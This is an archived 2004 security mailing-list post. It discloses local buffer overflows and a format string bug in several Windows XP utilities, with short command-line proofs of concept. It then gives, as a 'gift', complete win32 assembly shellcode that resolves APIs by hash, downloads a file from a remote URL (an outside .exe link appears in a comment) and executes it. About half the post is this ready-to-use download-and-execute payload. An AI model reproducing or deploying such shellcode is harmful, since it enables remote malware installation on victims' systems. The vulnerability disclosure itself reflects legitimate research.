Windows XP multiple local buffer overflows and format string bugs

[jerome.athias at caramail.com (Jérôme ATHIAS)]

Hi guys,

i just come after moving so sorry if i'm wrong but i don't remember to have seen this on the bugtraq, so if someone is 
interested...

AUTHOR
Komrade

DATE
08/10/2004

PRODUCT
Windows XP
Tested on Windows XP Service Pack 2, prior versions should have the same bugs.

DETAILS
Here is a list of some Windows XP utilities that are vulnerable to local buffer overlows and format string bugs.
These programming errors, alone, are not security vulnerabilities (you need local access and you don't gain more 
privilege), but they could became serious security issues if someone has the possibility to remotely start a program 
with at least a parameter (what happens with the "shell:" protocol security issue in the Mozilla browser prior to 
version 1.7.3, that permits to remotely execute a program and pass to it parameters).

These informations have been disclosed to inform you that if a new vulnerability will be discovered which allows remote 
execution of programs (passing parameters), all Windows XP operating system will be affected by several remote buffer 
overflows and format string vulnerabilities allowing remote code execution.

Buffer Overlow in immc.exe
POC
c:\> immc.exe aaaaaaaaaa(285 'a' characters)

Buffer Overlow in eventvwr.exe (UNICODE)
POC
c:\> eventvwr.exe aaaaaaaaaa(848 'a' characters)

Buffer Overlow in netsetup.exe
POC
c:\> netsetup.exe aaaaaaaaaa(285 'a' characters)

Buffer Overlow in mrinfo.exe
POC
c:\> mrinfo.exe aaaaaaaaaa(71 'a' characters)

Format String in sort.exe
POC
c:\> sort.exe %n%n%n%n%n%n%n%n%n%n%n%n%n%n%n%n


GIFT:
This is a generic win32 web downloading and executing shellcode for your collection

[BITS 32]


jmp     data
                
start:

        pop edi

        call LK32Base

        mov ebx,eax

        push eax                ; kernel32 base address
        push  0xec0e4e8e        ; LoadLibraryA hash
        call    LGetProcAddress ; find address


        xor ecx, ecx            ; ecx = 0
        mov cx, 0x6e6f          ; Move "on" in cx
        push ecx                ; Push null-terminated "on"
        push 0x6d6c7275         ; Push "urlm", completing "urlmon\0"
        push esp                ; lpLibFileName
        call eax                ; eax holds our function address

download:

        push eax                ; urlmon.dll base address
        push  0x702f1a36        ; URLDownloadToFileA hash
        call LGetProcAddress    ; find address
        


        xor ecx, ecx            ; ecx = 0 for later use
        push ecx                ; lpfnCB
        push ecx                ; dwReserved
        lea esi, [edi ] ; Path is [edi + start_of_filename]
        push esi                ; szFileName
        lea esi, [edi+8]
        push esi                ; szURL
        push ecx                ; pCaller
        call eax                ; eax holds our function address

exec:   
        push ebx
        push 0x0e8afe98
        call LGetProcAddress  ;winexec


        push ecx                
        push edi                
        call eax                

        
        xor ecx,ecx
        dec ecx
bla:
        
        
        loop bla                ;stupid loop remove if you don't like it

        
        push ebx
        push 0x73e2d87e
        call LGetProcAddress  
        call eax                ;exit

        LK32Base:
                push ebp
                push esi

                mov eax, [fs:0x30]
                

                mov eax, [eax + 0x0c] 
                mov esi, [eax + 0x1c] 
                lodsd  
                mov ebp, [eax + 0x08] 
        
                mov eax, ebp
                pop esi
                pop ebp
                ret 



        LGetProcAddress:

                push ebx
                push ebp
                push esi
                push edi
                
                mov ebp, [esp + 24]; DLL Base Address */
                mov eax, [ebp + 0x3c]; eax = PE header offset */
                mov edx, [ebp + eax + 120]
                add edx, ebp; edx = exports directory table */
                mov ecx, [edx + 24]; ecx = number of name pointers */
                mov ebx, [edx + 32]
                add ebx, ebp; ebx = name pointers table */

        LFnlp:
                jecxz LNtfnd
                dec ecx
                mov esi, [ebx + ecx * 4]
                add esi, ebp; esi = name pointer */
                xor edi, edi
                cld

        LHshlp:
                xor eax, eax
                lodsb
                cmp al, ah
                je LFnd
                ror edi, 13
                add edi, eax
                jmp LHshlp

        LFnd:
                ; compare computed hash to argument */
                cmp edi, [esp + 20]
                jnz LFnlp
                mov ebx, [edx + 36]; ebx = ordinals table RNA */
                add ebx, ebp
                mov cx, [ebx + 2 * ecx]; ecx = function ordinal */
                mov ebx, [edx + 28]; ebx = address table RVA */
                add ebx, ebp
                mov eax, [ebx + 4 * ecx]; eax = address of function RVA */
                add eax, ebp
                jmp LDone

        LNtfnd:
                xor eax, eax

        LDone:
                mov edx, ebp
                
                pop edi
                pop esi
                pop ebp
                pop ebx         
                ret    


        data: 
        call start
        db "mhh.exe",0x00
;       db "http://www.ilovedelikon.com/notbig.exe";, 0x00

Sorry if these informations are out of date or shit...null

Forfait AOL ADSL 5 M?ga ? 22.90EUR/mois